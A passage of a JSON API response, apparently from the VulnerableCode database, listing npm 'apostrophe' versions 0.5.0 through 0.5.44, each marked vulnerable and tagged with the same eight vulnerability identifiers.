postrophe@0.5.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.0"},{"url":"http://public2.vulnerablecode.io/api/packages/268090?format=json","purl":"pkg:npm/apostrophe@0.5.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.1"},{"url":"http://public2.vulnerablecode.io/api/packages/268091?format=json","purl":"pkg:npm/apostrophe@0.5.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.2"},{"url":"http://public2.vulnerablecode.io/api/packages/268092?format=json","purl":"pkg:npm/apostrophe@0.5.4","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.4"},{"url":"http://public2.vulnerablecode.io/api/packages/268093?format=json","purl":"pkg:npm/apostrophe@0.5.5","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.5"},{"url":"http://public2.vulnerablecode.io/api/packages/268094?format=json","purl":"pkg:npm/apostrophe@0.5.6","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.6"},{"url":"http://public2.vulnerablecode.io/api/packages/268095?format=json","purl":"pkg:npm/apostrophe@0.5.7","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.7"},{"url":"http://public2.vulnerablecode.io/api/packages/268096?format=json","purl":"pkg:npm/apostrophe@0.5.8","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.8"},{"url":"http://public2.vulnerablecode.io/api/packages/268097?format=json","purl":"pkg:npm/apostrophe@0.5.9","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.9"},{"url":"http://public2.vulnerablecode.io/api/packages/268098?format=json","purl":"pkg:npm/apostrophe@0.5.10","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.10"},{"url":"http://public2.vulnerablecode.io/api/packages/268099?format=json","purl":"pkg:npm/apostrophe@0.5.11","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.11"},{"url":"http://public2.vulnerablecode.io/api/packages/268100?format=json","purl":"pkg:npm/apostrophe@0.5.12","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.12"},{"url":"http://public2.vulnerablecode.io/api/packages/268101?format=json","purl":"pkg:npm/apostrophe@0.5.13","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.13"},{"url":"http://public2.vulnerablecode.io/api/packages/268102?format=json","purl":"pkg:npm/apostrophe@0.5.14","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.14"},{"url":"http://public2.vulnerablecode.io/api/packages/268103?format=json","purl":"pkg:npm/apostrophe@0.5.15","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.15"},{"url":"http://public2.vulnerablecode.io/api/packages/268104?format=json","purl":"pkg:npm/apostrophe@0.5.16","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.16"},{"url":"http://public2.vulnerablecode.io/api/packages/268105?format=json","purl":"pkg:npm/apostrophe@0.5.17","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.17"},{"url":"http://public2.vulnerablecode.io/api/packages/268106?format=json","purl":"pkg:npm/apostrophe@0.5.18","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.18"},{"url":"http://public2.vulnerablecode.io/api/packages/268107?format=json","purl":"pkg:npm/apostrophe@0.5.19","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.19"},{"url":"http://public2.vulnerablecode.io/api/packages/268108?format=json","purl":"pkg:npm/apostrophe@0.5.20","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.20"},{"url":"http://public2.vulnerablecode.io/api/packages/268109?format=json","purl":"pkg:npm/apostrophe@0.5.21","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.21"},{"url":"http://public2.vulnerablecode.io/api/packages/268110?format=json","purl":"pkg:npm/apostrophe@0.5.22","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.22"},{"url":"http://public2.vulnerablecode.io/api/packages/268111?format=json","purl":"pkg:npm/apostrophe@0.5.23","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.23"},{"url":"http://public2.vulnerablecode.io/api/packages/268112?format=json","purl":"pkg:npm/apostrophe@0.5.24","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.24"},{"url":"http://public2.vulnerablecode.io/api/packages/268113?format=json","purl":"pkg:npm/apostrophe@0.5.25","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.25"},{"url":"http://public2.vulnerablecode.io/api/packages/268114?format=json","purl":"pkg:npm/apostrophe@0.5.26","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.26"},{"url":"http://public2.vulnerablecode.io/api/packages/268115?format=json","purl":"pkg:npm/apostrophe@0.5.27","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.27"},{"url":"http://public2.vulnerablecode.io/api/packages/268116?format=json","purl":"pkg:npm/apostrophe@0.5.28","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.28"},{"url":"http://public2.vulnerablecode.io/api/packages/268117?format=json","purl":"pkg:npm/apostrophe@0.5.29","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.29"},{"url":"http://public2.vulnerablecode.io/api/packages/268118?format=json","purl":"pkg:npm/apostrophe@0.5.30","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.30"},{"url":"http://public2.vulnerablecode.io/api/packages/268119?format=json","purl":"pkg:npm/apostrophe@0.5.31","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.31"},{"url":"http://public2.vulnerablecode.io/api/packages/268120?format=json","purl":"pkg:npm/apostrophe@0.5.32","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.32"},{"url":"http://public2.vulnerablecode.io/api/packages/268121?format=json","purl":"pkg:npm/apostrophe@0.5.33","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.33"},{"url":"http://public2.vulnerablecode.io/api/packages/268122?format=json","purl":"pkg:npm/apostrophe@0.5.34","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.34"},{"url":"http://public2.vulnerablecode.io/api/packages/268123?format=json","purl":"pkg:npm/apostrophe@0.5.35","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.35"},{"url":"http://public2.vulnerablecode.io/api/packages/268124?format=json","purl":"pkg:npm/apostrophe@0.5.36","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.36"},{"url":"http://public2.vulnerablecode.io/api/packages/268125?format=json","purl":"pkg:npm/apostrophe@0.5.37","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.37"},{"url":"http://public2.vulnerablecode.io/api/packages/268126?format=json","purl":"pkg:npm/apostrophe@0.5.38","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.38"},{"url":"http://public2.vulnerablecode.io/api/packages/268127?format=json","purl":"pkg:npm/apostrophe@0.5.39","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.39"},{"url":"http://public2.vulnerablecode.io/api/packages/268128?format=json","purl":"pkg:npm/apostrophe@0.5.40","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.40"},{"url":"http://public2.vulnerablecode.io/api/packages/268129?format=json","purl":"pkg:npm/apostrophe@0.5.41","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.41"},{"url":"http://public2.vulnerablecode.io/api/packages/268130?format=json","purl":"pkg:npm/apostrophe@0.5.42","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.42"},{"url":"http://public2.vulnerablecode.io/api/packages/268131?format=json","purl":"pkg:npm/apostrophe@0.5.43","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.43"},{"url":"http://public2.vulnerablecode.io/api/packages/268132?format=json","purl":"pkg:npm/apostrophe@0.5.44","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vu